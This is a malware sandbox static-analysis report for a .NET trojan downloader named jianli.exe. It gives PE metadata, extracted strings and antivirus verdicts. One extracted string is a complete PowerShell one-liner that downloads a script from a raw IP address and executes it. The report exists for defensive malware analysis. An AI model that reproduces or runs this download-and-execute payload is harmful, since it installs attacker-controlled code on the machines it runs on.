popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2049-12-24 15:01:09

PDB Path

C:\Users\Lenovo\Desktop\代码 (2)\代码 (2)\Nopowershell-main (2)\Nopowershell-main\Csharp\NoPower\obj\Debug\jianli.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000227c 0x00002400 5.32900506028
.rsrc 0x00006000 0x00005ac8 0x00005c00 4.81299528797
.reloc 0x0000c000 0x0000000c 0x00000200 0.0776331623432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00006100 0x00005488 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_GROUP_ICON 0x0000b598 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0000b5bc 0x0000030c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0000b8d8 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
__StaticArrayInitTypeSize=22
3641A5528332A7714FECC752E2489F67EE422B26EE0E3CD54BC984494F6747A2
__StaticArrayInitTypeSize=26
<Module>
<PrivateImplementationDetails>
CEC5E0136F94E9DA94E787BB8C20CF0EE2DFE74CF23C75E5C0AA345E6E00A59B
System.IO
get_Data
set_Data
ShowData
mscorlib
Microsoft.VisualBasic
Thread
Synchronized
<Data>k__BackingField
<LeftSubNode>k__BackingField
<RightSubNode>k__BackingField
<Root>k__BackingField
Append
CreateRunspace
defaultInstance
get_LeftSubNode
set_LeftSubNode
get_RightSubNode
set_RightSubNode
subNode
newNode
decode
basecode
get_Message
NewObje
IDisposable
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
Console
OpenStorageRunTime
WriteLine
CreatePipeline
PrivateRunPipeline
ValueType
get_Culture
set_Culture
resourceCulture
ApplicationSettingsBase
Dispose
DebuggerBrowsableState
EditorBrowsableState
Mystate
Activate
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
jianli.exe
PrivatePlumbing
System.Threading
NewLateBinding
System.Runtime.Versioning
FromBase64String
get_Length
jianli
System.ComponentModel
LateCall
Program
System
get_ActiveForm
resourceMan
WinMain
Nothin
get_Location
System.Management.Automation
System.Configuration
System.Globalization
System.Reflection
CommandCollection
Exception
CultureInfo
get_ResourceManager
System.CodeDom.Compiler
NoPower
.cctor
System.Diagnostics
get_Commands
baXorredRes
System.Management.Automation.Runspaces
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
NoPower.Properties.Resources.resources
DebuggingModes
NoPower.Properties
Settings
System.Windows.Forms
RuntimeHelpers
Exists
Object
AppendLeft
AppendRight
get_Default
DialogResult
CriticalOperatingPoint
get_Root
set_Root
AddScript
Insert
Convert
MessageBox
InitializeArray
baXorKey
get_Assembly
GetEntryAssembly
RunspaceFactory
WrapNonExceptionThrows
NoPower
Copyright
2023
$2f900d1f-c7a1-44b1-b671-ba155f2ecf03
1.0.0.0
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.5
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.10.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\Lenovo\Desktop\
(2)\Nopowershell-main (2)\Nopowershell-main\Csharp\NoPower\obj\Debug\jianli.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Data={0}
asdfghjklqwertyuiopzxcvbnm12345678790!@#$%^&*()
NoPower.Properties.Resources
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
function RunPS {param ([String]$Script = '')$scriptBlock=[ScriptBlock]::Create($script);$scriptBlock.Invoke()}[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Add-Type -AssemblyName 'System.Net.Http';$client=New-Object System.Net.Http.HttpClient;$response=$client.GetAsync('http://207.246.123.37:8000/c.ps1').Result;$content=$response.Content.ReadAsStringAsync().Result;RunPS $content
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Invoke
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
NoPower
FileVersion
1.0.0.0
InternalName
jianli.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
jianli.exe
ProductName
NoPower
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
DrWeb Clean
MicroWorld-eScan Trojan.GenericKD.66383371
ClamAV Clean
FireEye Generic.mg.7a18c24858f521f7
CAT-QuickHeal Clean
McAfee Artemis!7A18C24858F5
Cylance unsafe
VIPRE Trojan.GenericKD.66383371
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (W)
BitDefender Trojan.GenericKD.66383371
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Gen:NN.ZemsilF.36132.cm0@a4CdsHl
VirIT Clean
Cyren Clean
Symantec Trojan.Gen.MBT
tehtris Clean
ESET-NOD32 MSIL/TrojanDownloader.Agent.PBP
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.MSIL.Crypt.gen
Alibaba Trojan:MSIL/Generic.68de031e
NANO-Antivirus Clean
ViRobot Clean
Rising Downloader.Agent!8.B23 (CLOUD)
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.nm
Trapmine Clean
CMC Clean
Emsisoft Trojan.GenericKD.66383371 (B)
SentinelOne Clean
GData Trojan.GenericKD.66383371
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Trojan/Win32.SGeneric
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Clean
Arcabit Trojan.Generic.D3F4EE0B
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Crypt.gen
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis suspicious
VBA32 Clean
ALYac Trojan.GenericKD.66383371
MAX malware (ai score=86)
DeepInstinct MALICIOUS
Malwarebytes Trojan.PCrypt.MSIL.Generic
Panda Clean
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R03BH0DDE23
Tencent Msil.Trojan-Downloader.Ader.Rgil
Yandex Clean
Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet PossibleThreat
AVG FileRepMalware [Misc]
Avast FileRepMalware [Misc]
No IRMA results available.